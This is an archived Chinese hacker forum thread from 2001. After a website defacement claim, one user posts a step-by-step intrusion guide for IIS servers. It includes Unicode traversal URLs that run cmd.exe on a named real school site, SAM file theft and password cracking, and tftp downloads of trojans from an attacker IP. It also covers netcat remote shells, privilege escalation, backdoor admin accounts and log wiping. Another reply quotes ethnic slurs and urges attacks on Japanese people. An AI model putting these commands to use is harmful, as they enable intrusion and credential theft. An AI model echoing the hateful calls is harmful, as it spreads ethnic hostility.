Email:Dansnow@21cn.com OICQ:99118 (仅此一个号码)

特别邀请SharkStorm(www.SharkStorm.net)管理论坛

论坛名称:小榕论坛  版主:小榕 SharkStorm http://www.netXeyes.com


将文章加入您的收藏夹 将本页发给您的朋友 将本页输出到打印机
文章标题: 呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索CoolFishs所有的帖子 查看CoolFishs的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给CoolFishs留言 给CoolFishs发信 访问CoolFishs的主页 修改帖子 CoolFishs的OICQ号码:422716 CoolFishs的IP地址:202.103.185.* 删除此帖子

http://www.kfjh.hlc.edu.tw/ / 离线
 MSIE 4.01 Windows 95
作者: CoolFishs http://transfish.yeah.net/ 时间:2001-01-29.18:26:38 来源:北京
Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索sea所有的帖子 查看sea的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给sea留言 给sea发信 访问sea的主页 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 sea的IP地址:61.157.3.* 删除此帖子

呵呵,小手段别拿出来丢丑,自己申请的,然后做一个被黑的页面. 离线
 MSIE 5.5 Windows 98
作者: sea 施工中.... 时间:2001-01-30.00:09:05 来源:四川

CoolFishs,好厉害啊,是用流光吗?    搜索zc0915所有的帖子 查看zc0915的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给zc0915留言 给zc0915发信 修改帖子 zc0915的OICQ号码:5070209 回复 CoolFishs,好厉害啊,是用流光吗? zc0915的IP地址:61.135.47.* 删除此帖子

我这里网速太慢,干不了什么好活,以后大家多切磋吧。。。

对了,可以把你的破解步骤说一下吗?谢谢。。:)
——————————
::我追求完美自由的黑客理念而非破坏::
离线
 MSIE 5.01 Windows NT 5.0
作者: zc0915  时间:2001-01-30.00:40:55 来源:北京

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索红崆天道之雪蜘蛛所有的帖子 查看红崆天道之雪蜘蛛的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给红崆天道之雪蜘蛛留言 给红崆天道之雪蜘蛛发信 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 红崆天道之雪蜘蛛的IP地址:61.138.8.* 删除此帖子

蜘蛛对上述网站用tracert跟踪了一下,是真正的网站,不是镜象。但不像是被coolfish黑过的。原因:主页的日期并非最近修改过的。反正今天也有空,就给大家讲讲
如何入侵一个网站吧。可不是用流光啊~!

首先对其进行扫描。其结果可以入侵的漏洞如下:(可以拒绝攻击的漏洞就省略···)
并带有讲解!

☆发现/scripts/tools/newdsn.exe漏洞
newdsn.exe
个存在于/scripts/tools目录下的newdsn.exe文件允许任何一个用户在web根目录下创建任何文件。
1. 创建文件:http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=Evil2+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2Fevil2.htm&newdb=CREATE_DB&attr=

☆发现/_vti_bin/shtml.dll漏洞

shtml.dll在Frontpage Extention Server/Windows2000 Server上输入一个不存在的文件将可以得到web目录的本地路径信息. 但是如果我们请求并非HTML、SHTML或者ASP后缀的文件,我们将会得到不同的信息. <a href="http://TrustedServer/_vti_bin/shtml.dll/<script>Hostile Code Here</script>">http://TrustedServer</a>如果用户点击上述指定的链接,脚本将通过HTTP请求从客户端传送给可信任的站点,可信任站点然后将该脚本作为错误信息的一部分返回给客户端。客户端在收到包含该脚本的出错页面时,将执行该脚本,并将赋予来自可信任站点的内容的所有权力赋予该脚本。另外,shtml.dll对较长的带html后缀的文件名都会进行识别和处理,利用这一点,可以对IIS服务器执行DOS攻击,以下这个程序,能使目标服务器的CPU占用率达到 100%,并且耗用所有的应用程序日志空间。系统在数分钟内会报告应用程序日志已满。
攻击方法:
暴露路径:http://www.victim.com/_vti_bin/shtml.dll/something.html
这样将返回以下信息:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
可信任站点执行脚本:使用如下格式的URL:
http://iis5server/_vti_bin/shtml.dll/<script>alert('document.domain='+document.domain)</script>
;


☆?PageServices漏洞是所有网站都有的吧。(至少什么浪的,什么易的,什么虎的)
但是有好多人扫描出来但是不知道如何运用,在此我给大家讲一下吧。

这个是可以显示页面清单的!运气好的话还可以得到用户名和密码!(都是明文的)
方法是url/?PageServices
还可以这样试试
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver /?wp-stop-ver /?wp-uncheckout

☆nicode漏洞一直闹的很凶吧!!把下面的代码拷贝到浏览器里试试。。以后的就不用我在说了吧,自己找nicode漏洞的教程吧。如果不会就来“黑色之晴”论坛看看吧。
www.kfjh.hlc.edu.tw/scripts/..%c19c../winnt/system32/cmd.exe?/
c+dir+C:\Inetpub\wwwroot

这是显示的内容:
Directory of C:\Inetpub\wwwroot

00/06/29 09:31a <DIR> .
00/06/29 09:31a <DIR> ..
99/06/01 08:33p <DIR> 85
99/06/01 08:34p <DIR> 86
99/06/01 08:33p <DIR> 87
98/03/07 12:13a <DIR> cgi-bin
98/03/07 12:13a <DIR> images
99/05/23 11:14a <DIR> kfjh
99/05/19 09:56p <DIR> samples
98/03/07 12:13a <DIR> _private
10 File(s) 0 bytes
915,182,592 bytes free

快去看看啊。去晚了说不定就让谁该了~~~

也欢迎大家到“黑色之晴”论坛发表言论! 可爱的蜘蛛走了~~~拜


此消息由红崆天道之雪蜘蛛在2001-01-30.02:07:55编辑过!
——————————
要学会同时思考几件事情,将来的成功者就是能同时做几件事情的人
离线
 MSIE 5.0 Windows 98
作者: 红崆天道之雪蜘蛛  时间:2001-01-30.01:07:25 来源: №红崆天道№

您所说的命令是UNIX下的不吧,我不太熟。。。    搜索zc0915所有的帖子 查看zc0915的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给zc0915留言 给zc0915发信 修改帖子 zc0915的OICQ号码:5070209 回复 您所说的命令是UNIX下的不吧,我不太熟。。。 zc0915的IP地址:61.135.50.* 删除此帖子

但仔细看看又好象是URL,总是我是菜鸟一个,呵呵。。。可以帮帮后进吗?:)
——————————
::我追求完美自由的黑客理念而非破坏::
离线
 MSIE 5.01 Windows NT 5.0
作者: zc0915  时间:2001-01-30.03:45:35 来源:北京

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索红崆天道之雪蜘蛛所有的帖子 查看红崆天道之雪蜘蛛的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给红崆天道之雪蜘蛛留言 给红崆天道之雪蜘蛛发信 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 红崆天道之雪蜘蛛的IP地址:61.138.8.* 删除此帖子

咦???楼上的那个大眼睛!

好奇怪啊,我怎么就没看出来哪里有UNIX的命令啊!:)

这可是满大街都能看到的“洞”unicode漏洞啊。《==很火的,溯雪见了都化了耶!

我写的不是很明白吗!
——————————
要学会同时思考几件事情,将来的成功者就是能同时做几件事情的人
离线
 MSIE 5.0 Windows 98
作者: 红崆天道之雪蜘蛛  时间:2001-01-30.03:55:15 来源: №红崆天道№

Re:Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索蚂蚁所有的帖子 查看蚂蚁的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给蚂蚁留言 给蚂蚁发信 修改帖子 蚂蚁的OICQ号码:44170006 回复 Re:Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 蚂蚁的IP地址:202.99.152.* 删除此帖子

兄弟:
是个很菜很菜的鸟,听大哥一番话我才豁然开朗:-0不过还是什么也不懂,想请教一下还有什么好方法吗???今天兄弟看了一段日本人的论述很精彩,精彩的让我想揍他!!我想和大家分享不只是否同意??
“因为看到中国人竟是如此的野蛮低级!你们黑掉的只是个小网站!或者这个网站根本就是你们的!你们的经济落后!怎么和我们斗?你们的留学生成千上万都不愿回自己的祖国!甚至在日本做一些下等活!我们日本人来中国要受到中国政府的欢迎!而你们去日本要受到歧视!就这样我们都不愿以来你们的破国家!不过我是为了国家才到中国留学的!而且也有一个中国的女友!她还天真的以为我会带她去日本!哈哈!笑话!她只是相当于一个慰安妇!我从来不把之那人当人!!因为它们是劣等民族!哈哈!!等我学好了之那的语言!就会为天皇陛下服务!到时候彻底消灭你们这群之那猪!!”
这种卑略的日本狗让我相干他全家,希望榕哥包括在座所有痛恨日本狗的兄弟姐妹帮忙除掉日本鸡,还我耳根清静,这不是网站上发表的,而是小日本个人的猖狂辱骂中国人,让我更愤怒。大哥大姐兄弟们帮帮兄弟教我两招让我在狗砸碎们的面前好好的骂他们两句!!!谢谢各位




——————————
我的话说完了~~~~
离线
 MSIE 5.01 Windows NT 5.0
作者: 蚂蚁  时间:2001-01-30.05:34:34 来源: hebeishengtangshan

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索红崆天道之雪蜘蛛所有的帖子 查看红崆天道之雪蜘蛛的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给红崆天道之雪蜘蛛留言 给红崆天道之雪蜘蛛发信 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 红崆天道之雪蜘蛛的IP地址:61.138.7.* 删除此帖子

我CAO他妈的狗日的!!!中国人岂是他们能比的!!!!!!!!

中国黑客他们见的还少的呢!!!!先看看这里:中国黑客攻克一日本严重辱华网站

www.zhina.homestead.com


我们大家一定要团结起来:酝酿半年之久的中国鹰派俱乐部终于成立,想加入的网友请访问

www.chinawill.com


蜘蛛在对上文做一下简单的细节,对一点也不会的初级朋友。

http://www.kfjh.hlc.edu.tw/scripts/..%c19c../winnt/system32/cmd.exe?/c+dir+C:\Inetpub\wwwroot
没错是个URL。大家在来向下看看unicode的漏洞〈==菜鸟看看吧。

最近这些日子好多的WINNT的服务器被黑,尤其是国内的。下面是一些具体示例的总结。
下面这类型的漏洞以发现近一年多了,一年多前在国外的黑客网站就有了类似的文章,但是当时
并没有很多人重视。,在反北约的黑客战中有很多就是用下面这些例子了。
不过直到UNICOUDE漏洞的发现,黑NT的计算机变的傻瓜化了。下面我把最近的一些文章总结一下。
希望大家能从这里体会到点什么。(下面的文章来自一些邮件列表和BBS)


原理:(其实原来都很相似,我拿这个做个例子。)

NSFOCUS安全小组发现IIS 4.0和IIS 5.0在Unicode字符解码的实现中存在一个安全漏洞,
导致用户可以远程通过IIS执行任意命令。当IIS打开文件时,如果该文件名包含unicode
字符,它会对其进行解码,如果用户提供一些特殊的编码,将导致IIS错误的打开或者执
行某些web根目录以外的文件。
对于IIS 5.0/4.0中文版,当IIS收到的URL请求的文件名中包含一个特殊的编码例如"%c1%hh"
或者"%c0%hh",它会首先将其解码变成:0xc10xhh, 然后尝试打开这个文件,Windows 系统
认为0xc10xhh可能是unicode编码,因此它会首先将其解码,如果 0x00<= %hh < 0x40的话,
采用的 解码的格式与下面的格式类似:
%c1%hh -> (0xc1 - 0xc0) * 0x40 + 0xhh
%c0%hh -> (0xc0 - 0xc0) * 0x40 + 0xhh
因此,利用这种编码,我们可以构造很多字符,例如:
%c1%1c -> (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/'
%c0%2f -> (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\'
攻击者可以利用这个漏洞来绕过IIS的路径检查,去执行或者打开任意的文件。
(1) 如果系统包含某个可执行目录,就可能执行任意系统命令。下面的URL可能
列出当前目录的内容:
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
(2) 利用这个漏洞查看系统文件内容也是可能的:
http://www.victim.com/a.asp/..%c1%1c../..%c1%1c../winnt/win.ini
Rain Forest Puppy <rfp@WIRETRIP.NET>测试发现对于英文版的IIS 4.0/5.0,此问题同样
存在,只是编码格式略有不同,变成"%c0%af"或者"%c1%9c".
下面我们的例子以%c1%1c为主讲解。
注:+号可以用%20代替,依这种格式你还可以构造出许多命令
好多站点\inetpub\下的scripts目录删除了,
但\Program Files\Common Files\System\下
的msadc还在(有msadcs.dll漏洞的话就不用
%c1%1c了)。这时可以如下构造请求:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\


实践一:(修改主页----最简单化的一种)

很多入侵都以修改主页的形式表现出来,这通常有两种情况:一是表达自己的
愤慨——比如当年以美国为首的北约悍然轰炸我驻南使馆的突发事件之后,国内很多黑客
在ICQ、BBS一呼百应,纷纷对敌国进行各种形式的攻击,当然以替换主页最为大快人心!
二是在给网管发e-mail漏洞报告之后没反应,有的黑客按耐不住,就用修改主页的方式给予警告,
用以引起人们对于安全技术的重视。当然说起来这是违法的啦,所以大家要注意哦,不要光图一时的痛快,
呵呵!
可以使用ECHO命令、管道符等建立文件,修改文件内容。但因为IIS加载程序检测到有CMD.EXE或者COMMAND.COM串就要检测特殊字符“&|(,;%<>”,如果发现有这些字符就会返回500错误,所以不能直接使用CMD.EEX加管道符等。因此可以采用拷贝CMD.EXE换名的方法绕过去。
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+1/1/2001+>>+f:\wwwroot\xxx\default.asp
就改了主页了!
这种方法对于有负载均衡的主机很不方便,又需要几次才能完成,所以不好。袁哥给出了另一种更方便的办法。参考袁哥(yuange)的帖子《IIS不用拷贝CMD.EXE使用管道符等的方法》,可以这样:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+>+f:\wwwroot\xxx\default.asp
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwroot\xxx\default.asp
这样,主页就被更改成了:
Hacked by hacker
12/1/2k
当然我是没有这样做啦,不过这些东西我都在自己配置的环境下实现了,

在我练习的过程中发现,用ECHO写这些的时候很慢,如果你多次回车,过一阵屏幕刷新后主页上就会留下多个
你要写的内容。

注解:利用这个漏洞修改页面成一个漂亮一点的页面,可以实现字对齐,颜色的改变,加上连接,图片等。其中的原理很简单就是按照html的格式。但是要转换成Unicode码。具体的蜘蛛在这里就不多说了。有兴趣的大家可以试试看,就和做网页一样有趣



实践二(下载SAM文件)

http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32
/cmd.exe?/c+dir%20c:\发现列出了远程主机C:\下的所有文件,
执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c

+copy%20c:\autoexec.bat%20c:\autoexec.bak 成功实现文件的复制,
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+del%20c:\autoexec.bak 成功实现文件的删除,哇!太利害了。
随便浏览了一下,因为是国内的主机,不想搞破坏,只想练练手!目的:
获得Administrator权限。
执行:http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/
cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
把sam._文件拷贝到wwwroot文件内,输入:http://xxx.xxx.xxx.xxx/sam._
将sam._文件下载到本地,执行:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c
+del%20c:\inetpub\wwwroot\sam._清除痕迹。
在本机执行:C:>expand sam._ sam
启动l0phtcrack 2.5(可到http://rina.yofor.com/7index.html 下载),Import Sam File... 导入sam文件,Open Wordlist File...
打开一个字典,Run Crack,乖乖,要17个小时,不管它,让它慢慢破去,先睡个
觉先!五分钟后来一看,Administrator 的 Nt Password 居然是 123456,我昏,
网管们注意了,这种密码也可以取呀?执行:C:\>newletmein \\xxx.xxx.xxx -admin
扫描主机,发现管理员ID是:asdfghjk,执行:C:\>net use \\xxx.xxx.xxx.xxxc$
123456 /user:asdfghjk 成功联上对方主机,大功告成!窜到存放日志的目录:
winnt\system32\logfiles 看了看,呵呵!

实践三(用木马)

如果你对net use的使用不熟悉的话,可以找找相关的资料来看,net命令也是基本技能啊,好好掌握吧)
在本地设定一个共享目录,比如f:\123,把ncx99.exe和冰河服务端放在里面,同时为了试验,
放了一个0字节的1.txt;然后再tftp98中把目录指向f:\123,现在就要让对方运行tftp.exe来下载文件啦!
http://xxx.xxx.xxx.xxx/scripts/cmd.exe?/c+copy+c:\winnt\system32\tftp.exe%20f:\wwwroot\scripts
然后
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+1.txt+cosys.txt
(111.111.111.111表示我们的ip,或者是我们的tftp服务器ip)
看,返回下面的内容:
CGI 錯誤
所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是:

Transfer successful: 0 bytes in 2 seconds, 0 bytes/s
这就成功啦!看看:
http://xxx.xxx.xxx.xxx/scripts/sys.exe?/c+dir+1.txt
果然有的,哈,继续:
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+ncx99.exe+scripts.exe
现在继续把冰河弄上去,国货精品,也让同胞们看看嘛!这是最方便的啦,哈哈!
http://xxx.xxx.xxx.xxx/scripts/tftp.exe?-i+111.111.111.111+get+G_Client.exe+c:\winnt\system32\iinter.exe
返回:
CGI 錯誤
所指定的 CGI 應用程式處理有誤,它未傳回完整的 HTTP 標題。所傳回的標題是:

Transfer successful: 266240 bytes in 271 seconds, 982 bytes/s
成功啦,这样,我们就可以先让它中木马啦!
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/inter.exe
之后,用客户端连接过去,找到自己需要的东西,什么?你不知道你需要什么?
那你进去干什么?!学习啊?好啊,学到什么啦?总结一下,把纪录删掉(或者改写?覆盖?你自己想吧)

实际四(暴力法和权限升级)

在WIN2000的命令提示符下

这样输入
c:\>newletmein xxx.xxx.xxx.xxx -all -g
xxx.xxx.xxx.xxx是你要攻击的网站的IP地址
然后等待程序执行完毕,如果发现可用的用户名和密码,程序会告诉你,记住这个
用户名和密码,再这样输入(这里假设用户名为ADMIN。密码也是ADMIN)
c:\>net use \\XXX.XXX.XXX.XXX\IPC$ "ADMIN" /USER:"ADMIN"
程序显示命令完成,接着来
c:\>copy c:\netsvc.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>copy c:\ntsrv.exe \\xxx.xxx.xxx.xxx\admin$\system32
程序显示1个文件COPY成功
接着来
c:\>netsvc \\xxx.xxx.xxx.xxx schedule /start
等显示成功,接着来,这里假设对方时间为13:00(这里可以用NET TIME看时间)
c:\>at \\xxx.xxx.xxx.xxx 13:00 ntsrv.exe /port:65432 /nomsg
程序会告诉你这个命令的ID号,等时间一到,用木马连他的机器的65432端口
可以加上自己的密码,和更改端口,目标搞定

2,目标开了WEB服务,IIS有漏洞msadcs.dll漏洞,这个漏洞可以用TWWWSCAN扫描
到,为了确认这个漏洞,你可以在浏览器的网址栏里输入这个文件的具体路径来确认
IE将显示application/x_varg,说明这个漏洞存在,然后在PERL下,进行攻击
C:\Perl\BIN>perl -x msadcs.txt -h xxx.xxx.xxx.xxx
Please type the NT commandline you want to run (cmd /c assumed):\n
cmd /c 一般这里我用TFTP上传我的木马文件,但首先你得先设置好你的TFTP主机
tftp -i 127.0.0.1 get ntsrv.exe c:\winnt\system32\ntsrv.exe
这里127.0.0.1 是我的TFTP主机,TFTP目录下有NTSRV。EXE木马
如果程序执行成功,TFTP会显示文件传输的进度,然后再执行PERL,将木马激活
,你再用木马连上对方的机器,搞定

3,目标开了WEB服务,而且有SQL服务,一般SQL服务器开1433端口
如果WEB服务器用ASP等等。。。你如果能看到ASP或者GLOBAL。ASA的原码,
而且把用户名或者密码写在这里,OK,你已经差不多搞定拉
打开SQL SERVER 7。0 在client network uitlity里输入对方IP,通讯选TCP/IP
端口选1433,然后应用确定,再打开query analyzer SERVER选你要攻击的
IP,用户名和密码输入,连接他,等会,连上拉
在上面这样输入
create proc #1 as exec master..xp_cmdshell'dir c:\'
go
exec #1
按F5执行,会显示对方机器的文件目录,然后用TFTP上传你的木马,并且执行,再用木马连接他
搞定(需要注意的是PROC的号要执行1次换1个,单引号间是命令行)

4,目标开了WEB服务,IIS有漏洞,这里要说现在比较普遍的双字节编码漏洞。理论
这里不说,也说不好,照着干就可以拉。发现目标XXX。XXX。XXX。XXX
在浏览器里输入
http://xxx.xxx.xxx.xxx/.idq
显示路径,WEB是在那里
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
这样我们将得到对方的文件目录
然后这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i 61.137.157.156 get ntsrv.exe c:\winnt\system32\ntsrv.exe
等文件传完,再这样
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\winnt\system32\ntsrv.exe
木马被启动,用木马连上,搞定。

如果权限不够,我们下面来升级权限
自己C盘下的gasys.dll、cmd.exe和getadmin.exe到对方的E盘下,
(这三个文件是黑NT毕备的,很多站点可以下载到)

可以到DOS下输入:(下面是NETUSE后的盘,如果不懂,先学NETUSE去)
C:\>copy c:\gasys.dll F:\
1 file(s) copied.
C:\>copy c:\cmd.exe F:\
1 file(s) copied.
C:\>copy c:\getadmin.exe F:\
1 file(s) copied.
至此为止,肉鸡已经搞定了。现在我们要象主目标进行攻击了。假设对方网站的ip是127.1.1.1,先要把cmd.exe复制到scripts的目录下面,并且要改名,假设对方的物理盘为E :
http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+e:\winnt\system32\cmd.exe+e:\inetpub\scripts\hackercn
.exe
这样我们就已经把cmd.exe复制到了scripts的目录下,并改名为hackercn.exe。现在我们要用它把我们肉鸡上的E盘影射为这个网站服务器上的Y 盘:
http://127.1.1.1/scripts/hackercn.exe?/c+net+use+Y:+\\127.1.1.2\E

然后把我们copy过去的那3个文件再copy到网站服务器上(cmd.exe虽然刚才已经copy过去了,但因为改了名,所以还要再copy一次):
http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:\gasys.dll+d:\inetpub\scripts\gasys.dll

http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:\cmd.exe+d:\inetpub\scripts\cmd.exe

http://127.1.1.1/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+Y:\getadmin.exe+d:\inetpub\scripts\getadmin.exe


好了,现在我们需要把“IUSR_计算机名”这个帐号升级为Administrator(并不是每个站点都有“IUSR_计算机名”这个帐号)。假设这台计算机名为“S ERVERS”,那么我们可以这样做:
http://127.1.1.1/scripts/getadmin.exe?IUSR_SERVERS

这样所有的访问者都有了Administrator限权,
然后我们再来新建一个用户名为hacker密码为password的用户:
http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add
然后再把它授予Administrator限权:
http://127.1.1.1/scripts/getadmin.exe?hacker

下来就是进入该系统并制作后门了:
在nt的dos下输入
C:\>net use \\127.1.1.1\ipc$ "password" /user:"hacker"
现在你已经登陆到了他的主机上,然后上传木马冰河:
C:\>copy C:\unzipped\newglacier\G_Server.exe \\127.1.1.1\admin$\system32
然后用net time来获得对方的时间:
C:\>net time \\127.1.1.1
假设对方的时间是5点40,那么我们将在5点43启动冰河程序:
C:\>at \\127.1.1.1 05:43 G_Server.exe

这样我们就完整的实现了一次入侵,别忘了最后要打扫战场
用冰河很讨厌,我个人是不赞成用木马的,我们可以上载其他端口程序。

实践五(简单实用)
我们假设1.29.58.9有这类型漏洞
myip就是我的IP,GIFT是我计算机上共享的文件名。我把NCx99.exe那个文件放到这个目录下了。
http://1.29.58.9/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\gift
时间要长点,多等一会儿。
成功后,你就可以用COPY命令,把NCX99.EXE文件从I盘CP过来了(放在system32或你喜欢的目录下)
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+i:\gift\ncx99.exe+c:\inetpub\scripts\ncx99.exe
启动ncx99.exe
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\scripts\ncx99.exe
用telnet连上就可以了。
如果权限不够可以用上面我们讲的方法来增加权限。或添加用户。

实践六(打扫战场)

打扫战场
最后一步就是清除我们用到的一些临时文件和测试的文件,伪装一下日志,
免得被发现,这就叫做是打扫战场。然后记得卸载冰河啊,我们不是过去破坏的,
只是为了学习和研究,熟悉入侵的手段和思想,学会分析问题,解决问题,为将来的实战做个练习而已嘛!
所以也不要修改主页啦!给他们的网管留一份e-mail也好啦!
其实,我们传上去的ncx99.exe是netcat的另一个版本,运行后,会把cmd.exe绑定到99端口,
也就是说,运行以后,会在99端口侦听,我们可以用telnet连接。
C:>telnet xxx.xxx.xxx.xxx 99
就看到:
c:\inetpub\scripts>
呵呵,现在就相当于进入他的机器啦,后面的东西不用继续说了吧?键入exit退出后,对方的ncx99也退出啦。如果你真的想要他的管理员账号,那么,我想,最起码可以这样:传个纪录键盘的东东上去,怎么样?比你破解简单多啦!你当然也可以用冰河什么的。你也可以给自己建个账号,方便自己,不过很可能会被发现的啦。
好啦好啦,不再说啦,烦死人了。
如果你用了木马,就要想办法去掉,要不就留到以后用。随你了。
这么一次入侵完成了,我们至少要学会入侵的基本步骤,还有入侵的思维方式啦。
好好体会吧。

实用命令总结:

列目录:
http://ip/msadc/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\
http://www.victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\

Copy文件
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy%20c:\winnt\repair\sam._%20c:\inetpub\wwwroot\
NET USE的使用
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/net.exe?/c+use+i:+\\myip\temp

改CMD方法
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\ccc.exe
然后
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp

FIND命令使用
比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容:
http://xxx.xxx.xxx.xxx/scripts/..%c1%1c..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as*

添加用户命令
新建一个用户名为hacker密码为password的用户:
http://127.1.1.1/script/cmd.exe?/c%20c:\winnt\system32\net.exe%20user%20hacker%20password%20/add

当然命令是构造出来的,利用这些规则我们可以写很多的类似的命令。
也希望大家把自己构造的好的想法和实现贴出来
如果你找不到目标可以去www.goole.com找。
它的危害大家我想都知道了。

今天好累了。明天蜘蛛会给朋友们写一份完整的攻击手迹,希望可以把大家带入
“黑客文化”的门槛里 呵:) 拜拜~


此消息由红崆天道之雪蜘蛛在2001-01-30.06:18:39编辑过!
——————————
要学会同时思考几件事情,将来的成功者就是能同时做几件事情的人
离线
 MSIE 5.0 Windows 98
作者: 红崆天道之雪蜘蛛  时间:2001-01-30.06:04:07 来源: №红崆天道№

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索CoolFishs所有的帖子 查看CoolFishs的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给CoolFishs留言 给CoolFishs发信 访问CoolFishs的主页 修改帖子 CoolFishs的OICQ号码:422716 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 CoolFishs的IP地址:61.143.249.* 删除此帖子

各位。。。我说我就是再没用也不至于说自己去申请个主页来骗大家或拿别人黑的东西来当自己的成果吧。。。没想到啊。。。嘿嘿。。。结果竟然会是这样。。。真无奈啊。。。
呵呵。。。算了。。。算我黑仔拉。。。
离线
 MSIE 4.01 Windows 95
作者: CoolFishs http://transfish.yeah.net/ 时间:2001-01-30.13:37:10 来源:北京

Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。    搜索红崆天道之雪蜘蛛所有的帖子 查看红崆天道之雪蜘蛛的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给红崆天道之雪蜘蛛留言 给红崆天道之雪蜘蛛发信 修改帖子 回复 Re:呵呵。。。刚刚干了件无聊事,各位不要见笑。。。 红崆天道之雪蜘蛛的IP地址:61.138.48.* 删除此帖子

朋友你是在说我吗?

我说过了。用tracert跟踪了一下,是真正的网站,并非是他们所说的假主页。

我只是借着有趣给大家讲解一下入侵的手法。

?????
——————————
要学会同时思考几件事情,将来的成功者就是能同时做几件事情的人
离线
 MSIE 5.0 Windows 98
作者: 红崆天道之雪蜘蛛  时间:2001-01-30.23:23:22 来源: №红崆天道№

蜘蛛兄再麻烦你一下。。。。    搜索zc0915所有的帖子 查看zc0915的信息 回复时引用此贴 复制此贴内容 将本贴子内容通过email打包下载 给zc0915留言 给zc0915发信 修改帖子 zc0915的OICQ号码:5070209 回复  zc0915的IP地址:61.135.47.* 删除此帖子

我用了你所说的这个IIS 漏洞,但结果如下(所开的文件不存在,WHY):

404: File Not Found
Perhaps it's hiding somewhere else?


--------------------------------------------------------------------------------

© Copyright 1997 victim-dot-com. webmaster@victim.com



——————————
